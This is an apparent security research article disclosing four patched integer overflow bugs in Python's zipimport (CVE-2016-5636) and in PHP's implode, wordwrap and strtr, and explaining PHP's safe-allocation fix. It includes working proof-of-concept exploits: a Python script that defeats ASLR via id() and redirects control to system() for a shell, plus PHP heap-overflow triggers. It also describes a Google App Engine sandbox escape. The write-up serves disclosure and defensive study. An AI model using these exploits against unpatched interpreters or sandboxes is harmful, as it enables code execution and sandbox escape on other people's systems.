Introduction

Security vulnerabilities in language interpreters are more critical than bugs in ordinary software because they can break trust in the trusted computing base (TCB), as Ken Thompson pointed out in his famous Turing Award lecture in 1984 [1]. For instance, such vulnerabilities break the security guarantees provided by security analysis tools or code audits, since most of these analyses are grounded in trust in the language interpreter. Instead of starting the security analysis from the low-level parts of a machine, the analysis takes the interpreter as its root of trust and then performs static and dynamic analyses over the language abstraction to test software for bugs. Although such analyses can catch bugs at the code level, they cannot detect vulnerabilities in the underlying interpreter. If any of these hidden vulnerabilities is exploited, it breaks the trust established by the analyses performed over the code.

Another example that is strongly affected by such bugs is the language interpreter sandbox used by cloud providers. Cloud providers such as Google App Engine modify the language interpreter to create a sandbox that offers the guest only a restricted environment (e.g., one that cannot execute shell commands or call OS-related functions). The main purpose of such sandboxes is to isolate the guest and limit its resources without running the code in a virtual machine, which is costly in performance. Nonetheless, since the restrictions of the sandbox are built on a trusted language interpreter, the isolation cannot be guaranteed if an attacker exploits a vulnerability in the interpreter.

In this article, we demonstrate four integer overflow vulnerabilities in the Python and PHP language interpreters, found in our recent research work [2], that can be exploited for control-flow hijacking. These vulnerabilities undermine trust in the language interpreters and thus break the security guarantees of language runtime sandboxes. We note that all of the vulnerabilities disclosed here have already been patched in the upstream releases of Python and PHP.

Python zipimporter heap overflow (CVE-2016-5636)

zipimport

$ python
>>> import sys
>>> sys.path
[..., '/usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg', ...]
$ file /usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg
/usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg: Zip archive data, at least v2.0 to extract

sys.path, the list of search paths for modules, can contain not only directories but also ZIP files. The zipimport module provides a way to import Python modules from ZIP-format archives.
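The mechanism can be tried out with a small, self-contained sketch. It is written for Python 3 (the listings in this article target Python 2), and the archive and module names are hypothetical, chosen only for illustration.

```python
import importlib
import os
import sys
import tempfile
import zipfile

# Build a ZIP archive containing one tiny module (names are hypothetical).
workdir = tempfile.mkdtemp()
archive = os.path.join(workdir, "demo_modules.zip")
with zipfile.ZipFile(archive, "w") as zf:
    zf.writestr("zip_demo_mod.py", "VALUE = 42\n")

# Putting the archive itself on sys.path lets the import system
# (through zipimport) locate modules stored inside it.
sys.path.insert(0, archive)
importlib.invalidate_caches()
zip_demo_mod = importlib.import_module("zip_demo_mod")

print(zip_demo_mod.VALUE)
print(zip_demo_mod.__file__)  # the reported path points inside the archive
```

The module is never unpacked to disk; its source is read straight out of the archive, which is the code path the vulnerability lives in.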

Vulnerability

// Modules/zipimport.c
bytes_size = compress == 0 ? data_size : data_size + 1;
if (bytes_size == 0)
    bytes_size++;
raw_data = PyBytes_FromStringAndSize((char *)NULL, bytes_size);

The vulnerability exists in the ZIP file decoder of the zipimport module. data_size, which is read from the ZIP file, is not properly validated. If data_size is 0xffffffff (-1) and compress is non-zero, then data_size + 1 evaluates to zero, and the following check bumps bytes_size, the size of the buffer that stores the file data, to one. Later, Python reads the file contents into this one-byte buffer, and a heap overflow occurs.
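The size computation can be modelled in a few lines of Python. This is only a sketch of the arithmetic in the C snippet, assuming a 32-bit integer width (Python integers do not wrap, so the mask emulates it); the helper name bytes_size_for is hypothetical.

```python
MASK32 = 0xFFFFFFFF  # assumption: the size is held in a 32-bit integer

def bytes_size_for(compress, data_size):
    """Mirror the bytes_size computation from the C snippet."""
    size = (data_size if compress == 0 else data_size + 1) & MASK32
    if size == 0:
        size += 1  # the "bytes_size++" branch
    return size

# A well-formed compressed entry gets one extra byte.
print(bytes_size_for(1, 100))
# The malicious size collapses to a one-byte buffer.
print(bytes_size_for(1, 0xFFFFFFFF))
print(bytes_size_for(1, -1))
```

Both spellings of the malicious value (0xffffffff and -1) end up requesting a single byte, while the amount of data later read from the file is unrelated to that size.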

Bypass ASLR

>>> hex(id('a'))
'0x7f6c2c677710'

To achieve arbitrary code execution, we need to bypass ASLR. Fortunately, Python (CPython) uses the memory address of an object as its id. By using the built-in id function, we can bypass ASLR.
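That id really is an address can be checked from within the interpreter. The sketch below assumes CPython and Python 3; it uses ctypes to reinterpret the integer returned by id as an object pointer, and the variable names are illustrative only.

```python
import ctypes

marker = ["any", "object"]   # hypothetical object whose address we want
address = id(marker)         # in CPython this is the object's memory address

# Reinterpret the integer as a PyObject* and fetch the object it points to.
recovered = ctypes.cast(address, ctypes.py_object).value

print(hex(address))
print(recovered is marker)
```

Getting the very same object back shows that the number leaked by id is a usable pointer into the process's address space.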

Proof of Concept

#!/usr/bin/env python2
import os
import zipimport
import zipfile
import struct

FILE = 'payload'
ZIP = 'import.zip'
DIR = 'sh'

if not os.path.exists(DIR):
    os.mkdir(DIR)

addr = id("A")
libc_base = addr
system_addr = libc_base + 0x46640
print("LIBC_BASE : %x" % libc_base)

bin_sh = os.path.join(DIR, struct.pack('<Q',  libc_base + 0x7b1998).replace("\x00", ""))
with open(bin_sh, 'w') as f:
    f.write("/bin/sh")
os.chmod(bin_sh, 0777)
os.putenv("PATH", os.getenv("PATH") + ":" + DIR)

some_string_obj = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"
some_string_obj += "QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZaaaabbbbccccddddeeeeffff"
some_string_obj += "gggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvv"
some_string_obj += "wwwwxxxxyyyyzzzz"
some_string_obj += "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"
some_string_obj += "QQQQRRRRSSSSTTTTUUUU"
print("%x" % id(some_string_obj))

# func addr here
some_string_obj += struct.pack('<Q', system_addr)
a = some_string_obj
addr = id(a)
addrs = []
for i in xrange(8):
    addrs.append(addr % 0x100)
    addr /= 0x100
addrs_2 = map(lambda x:chr(x), addrs)
print(addrs_2)

print("%x" % id(some_string_obj))
# generate input
with open(FILE, 'wb') as f:
    payload = ("aaaa"+("".join(addrs_2)) * 128)
    f.write(payload)

zf = zipfile.PyZipFile(ZIP, mode='w')
zf.write(FILE)
zf.close()

importer = zipimport.zipimporter(ZIP)
f = list(importer._files[FILE])
f[1] = 1 # compress
f[2] = -1 # file size
importer._files[FILE] = tuple(f)
importer.get_data(FILE)

Google App Engine

Since zipimport is an essential module for Python, it is on the whitelist of Google App Engine's Python sandbox. Consequently, an attacker can exploit this vulnerability to break out of the sandbox. We reported this issue to Google upon its discovery.

Integer Overflow in PHP

In PHP v7.0.2, strings are generally allocated by the zend_string_alloc() function.

// zend/zend_string.h
static zend_always_inline zend_string *zend_string_alloc(size_t len, int persistent)
{
    zend_string *ret = (zend_string *)pemalloc(ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(len)), persistent);

    GC_REFCOUNT(ret) = 1;
    //..

    ZSTR_LEN(ret) = len;
    return ret;
}

The function is a wrapper around pemalloc. It internally invokes pemalloc(size) to allocate memory, where size is derived from the len argument. The function itself does not appear to contain a bug; however, passing an arithmetic expression as the length argument can create a vulnerability.

Vulnerability example in php_implode

// ext/standard/string.c
PHPAPI void php_implode(const zend_string *delim, zval *arr, zval *return_value)
{
    // ...
    str = zend_string_alloc(len + (numelems - 1) * ZSTR_LEN(delim), 0);
    // ...
}

A vulnerable example is in the php_implode function. The function invokes zend_string_alloc with the following arithmetic expression as the length argument: len + (numelems - 1) * ZSTR_LEN(delim)

An integer overflow can arise in the expression if the values are carefully manipulated. For instance, when the length of the string delim is 65,536, the number of elements is 65,536, and the total string length len is 65,536, the size value wraps around to zero in 32-bit arithmetic: 65536 + 65535 * 65536 = 4294967296 = 2^32 = 0.
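The wraparound can be reproduced with a short Python sketch. It assumes a 32-bit size_t, which is what the arithmetic above implies; the helper name implode_alloc_len is hypothetical and only models the length expression, not PHP itself.

```python
SIZE_BITS = 32                      # assumption: 32-bit size_t
SIZE_MASK = (1 << SIZE_BITS) - 1

def implode_alloc_len(total_len, numelems, delim_len):
    """Model len + (numelems - 1) * ZSTR_LEN(delim) with size_t wraparound."""
    return (total_len + (numelems - 1) * delim_len) & SIZE_MASK

exact = 65536 + (65536 - 1) * 65536          # what the code intends to request
wrapped = implode_alloc_len(65536, 65536, 65536)  # what it actually requests
print(exact, wrapped)
```

The exact value is one past the largest 32-bit number, so the truncated request that reaches the allocator is far smaller than the data that will be copied.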

The following code shows the proof-of-concept (PoC) that exploits the vulnerability.

<?php
    $arr = [];
    for($i=0;$i<65536; ++$i) {
        $arr[$i]= "aa";
    }
    $text1 = str_repeat("ABCD", 16384);
    // Changing ABCD into other values will alter %eax and %ecx.
    $str = implode($text1, $arr);
?>

Exploiting the vulnerability requires the lengths of the string arguments to be chosen so that the expression overflows, as described above. To that end, we build $text1 as a 65,536-byte string (ABCD repeated 16,384 times) and pass it as the delimiter for an array of 65,536 elements.

We searched the ext/standard/string.c file for similar cases (i.e., uses of zend_string_alloc with a multiplication expression). We found three such cases and successfully created control-flow hijacking exploits for all of them.

php_wordwrap()

// ext/standard/string.c
PHP_FUNCTION(wordwrap)
{
    // ...

    // allocate string into newtext variable
    if (linelength > 0) {
        chk = (size_t)(ZSTR_LEN(text)/linelength + 1);
        newtext = zend_string_alloc(chk * breakchar_len + ZSTR_LEN(text), 0);
        alloced = ZSTR_LEN(text) + chk * breakchar_len + 1;
    } else {
        chk = ZSTR_LEN(text);
        alloced = ZSTR_LEN(text) * (breakchar_len + 1) + 1;
        newtext = zend_string_alloc(ZSTR_LEN(text) * (breakchar_len + 1), 0);
    }

    // ...

    // do multiple memcpy()...
    if(...) {

        memcpy(ZSTR_VAL(newtext) + newtextlen, ZSTR_VAL(text) + laststart, current - laststart + breakchar_len);

        memcpy(ZSTR_VAL(newtext) + newtextlen, ZSTR_VAL(text) + laststart, current - laststart);

        memcpy(ZSTR_VAL(newtext) + newtextlen, breakchar, breakchar_len);

        memcpy(ZSTR_VAL(newtext) + newtextlen, ZSTR_VAL(text) + laststart, current - laststart);

    }
}

In this code, wordwrap() allocates memory for the new string by calling zend_string_alloc with a size argument of either chk * breakchar_len + ZSTR_LEN(text) or ZSTR_LEN(text) * (breakchar_len + 1).

The expression for the size argument can overflow. In the second expression (ZSTR_LEN(text) * (breakchar_len + 1)), if the attacker supplies a 65,536 (2^16) character string as text and a 65,535 (2^16 - 1) character string as breakchar, the resulting value is 65,536 * (65,535 + 1) = 4294967296 = 0.

In such a case, zend_string_alloc allocates a zero-sized buffer (actually a little bigger than zero, because the request also covers the zend_string structure and is rounded up for alignment), and the subsequent memcpy calls overflow the heap buffer.
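Both branches of the allocation can be compared side by side in a small Python model. As before, this is a sketch that assumes a 32-bit size_t; wordwrap_alloc_len is a hypothetical helper that mirrors only the length expressions from the listing.

```python
SIZE_MASK = 0xFFFFFFFF  # assumption: 32-bit size_t

def wordwrap_alloc_len(text_len, linelength, breakchar_len):
    """Model the length passed to zend_string_alloc in either branch."""
    if linelength > 0:
        chk = text_len // linelength + 1
        return (chk * breakchar_len + text_len) & SIZE_MASK
    return (text_len * (breakchar_len + 1)) & SIZE_MASK

# Ordinary call: 64 KiB of text, width 75, one-character break string.
benign = wordwrap_alloc_len(65536, 75, 1)
# Attacker-chosen lengths with a non-positive width (second branch).
attack = wordwrap_alloc_len(65536, -1, 65535)
print(benign, attack)
```

The ordinary call requests slightly more than the input length, whereas the attacker-chosen lengths make the requested length collapse to zero.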

The following proof-of-concept code triggers the vulnerability.

<?php
    $text1 = str_repeat("A", 65536);
    $text2 = str_repeat("B", 65536 - 1);
    $newtext = wordwrap($text1, -1, $text2);
?>

When the lengths of the string arguments are set to 65,536 and 65,535 respectively, the subsequent memcpy calls inside the wordwrap function overflow the heap objects.

php_str_to_str_ex()

// ext/standard/string.c
static zend_string *php_str_to_str_ex(zend_string *haystack,
    char *needle, size_t needle_len, char *str, size_t str_len, zend_long *replace_count)
{
    //...
    // count is the number of times needle appears in the haystack
    new_str = zend_string_alloc(count * (str_len - needle_len) + ZSTR_LEN(haystack), 0);

    //...

    e = s = ZSTR_VAL(new_str);
    end = ZSTR_VAL(haystack) + ZSTR_LEN(haystack);
    for (p = ZSTR_VAL(haystack); (r = (char*)php_memnstr(p, needle, needle_len, end)); p = r + needle_len) {
        memcpy(e, p, r - p);
        e += r - p;
        memcpy(e, str, str_len);
        e += str_len;
        (*replace_count)++;
    }

    if (p < end) {
        memcpy(e, p, end - p);
        e += end - p;
    }

    //...
}

The variable new_str is allocated with zend_string_alloc using the multiplicative expression count * (str_len - needle_len) + ZSTR_LEN(haystack). If this value overflows, the allocation is smaller than expected, and the memcpy calls in the for loop that follows cause a heap overflow.

The following PoC code exploits the bug.

<?php
    $a = str_repeat('A', 65536);
    $b = str_repeat('ABCD', 32768);
    // Changing 'ABCD' into other value alters %eip to arbitrary value.
    $c = array('AA'=> $b);
    strtr($a , $c);
?>

The haystack is a string of length 65,536 and the needle is 'AA', so count is 32,768 ('A' * 65,536 can be split into 32,768 occurrences of 'AA'), and str_len is 131,072 (the length of 'ABCD' repeated 32,768 times). Therefore, the expression passed to zend_string_alloc evaluates to 32768 * (131072 - 2) + 65536 = 4294967296 = 0. Since the string object is allocated with size zero, running memcpy over the object in the for loop triggers a heap overflow.
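The numbers in this walk-through can be rechecked by building the same strings in Python and evaluating the expression. This is a sketch assuming a 32-bit size_t; Python's str.count counts non-overlapping occurrences, which matches how the loop advances by needle_len after each match.

```python
SIZE_MASK = 0xFFFFFFFF  # assumption: 32-bit size_t

haystack = "A" * 65536
needle = "AA"
replacement = "ABCD" * 32768

count = haystack.count(needle)   # non-overlapping occurrences of the needle
str_len = len(replacement)

# count * (str_len - needle_len) + ZSTR_LEN(haystack), exact and wrapped
exact = count * (str_len - len(needle)) + len(haystack)
wrapped = exact & SIZE_MASK
print(count, str_len, exact, wrapped)
```

The exact result is the number of bytes the copy loop goes on to write, while the wrapped result is the length the allocator is asked for.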

A Patch: zend_string_safe_alloc()

We reported these three vulnerabilities to PHP, and all of them were patched in PHP v7.0.4. The patches were very simple: they just change zend_string_alloc to zend_string_safe_alloc. Let's take a look at how this prevents the integer overflow bugs.

// zend/zend_string.h
static zend_always_inline zend_string *zend_string_safe_alloc(size_t n, size_t m, size_t l, int persistent)
{
    // calls _safe_malloc
    zend_string *ret = (zend_string *)safe_pemalloc(n, m, ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(l)), persistent);

    GC_REFCOUNT(ret) = 1;

    //...

    ZSTR_LEN(ret) = (n * m) + l;
    return ret;
}

// zend_alloc.c
// _safe_malloc calls zend_safe_address to check if n*m overflows.
ZEND_API void* ZEND_FASTCALL _safe_malloc(size_t nmemb, size_t size, size_t offset)
{
    // calls safe_address
    return pemalloc(safe_address(nmemb, size, offset), 1);
}

static zend_always_inline size_t safe_address(size_t nmemb, size_t size, size_t offset)
{
    int overflow;
    size_t ret = zend_safe_address(nmemb, size, offset, &overflow);

    if (UNEXPECTED(overflow)) {
        zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", nmemb, size, offset);
        return 0;
    }
    return ret;
}

// zend_multiply.h
static zend_always_inline size_t zend_safe_address(size_t nmemb, size_t size, size_t offset, int *overflow)
{
    size_t res = nmemb;
    size_t m_overflow = 0;

    __asm__ ("mull %3\n\taddl %4,%0\n\tadcl $0,%1"
            : "=&a"(res), "=&d" (m_overflow)
            : "%0"(res),
            "rm"(size),
            "rm"(offset));

    if (UNEXPECTED(m_overflow)) {
        *overflow = 1;
        return 0;
    }
    *overflow = 0;
    return res;
}

In contrast to zend_string_alloc, which receives the already-multiplied expression as its argument, zend_string_safe_alloc receives the factors of the size and performs the multiplication internally. In particular, zend_string_safe_alloc calls _safe_malloc (through safe_pemalloc), which calls safe_address, which in turn calls zend_safe_address. In zend_safe_address, the inline assembly checks whether multiplying the factors and adding the offset overflows. If an overflow arises, the allocation fails with an error message (at the if (UNEXPECTED(overflow)) check in safe_address()). Therefore, these integer overflow vulnerabilities no longer exist in the latest version of PHP.
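The idea behind the check can be expressed in a few lines of Python. This is a conceptual sketch rather than PHP's implementation: it assumes a 32-bit size_t, and both checked_size and AllocationOverflow are hypothetical names standing in for safe_address and the fatal error it raises.

```python
SIZE_MAX = 0xFFFFFFFF  # assumption: 32-bit size_t

class AllocationOverflow(Exception):
    """Hypothetical stand-in for the fatal error raised by safe_address."""

def checked_size(nmemb, size, offset):
    """Return nmemb * size + offset, or raise if it does not fit in size_t."""
    exact = nmemb * size + offset   # Python integers never wrap
    if exact > SIZE_MAX:
        raise AllocationOverflow(
            "Possible integer overflow in memory allocation "
            "(%d * %d + %d)" % (nmemb, size, offset))
    return exact

print(checked_size(874, 1, 65536))   # ordinary request passes through
try:
    checked_size(65536, 65536, 0)    # factors from the wordwrap PoC
except AllocationOverflow as exc:
    print("rejected:", exc)
```

Because the factors arrive separately, the check sees the full product before it is truncated, which is exactly what the caller of zend_string_alloc could not guarantee.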

[1] Thompson, K. (1984). Reflections on trusting trust. Communications of the ACM, 27(8), 761-763.

[2] Yun, I., et al. (2016). APISAN: Sanitizing API Usages through Semantic Cross-checking. In Proceedings of the 25th USENIX Security Symposium (Security), Austin, TX.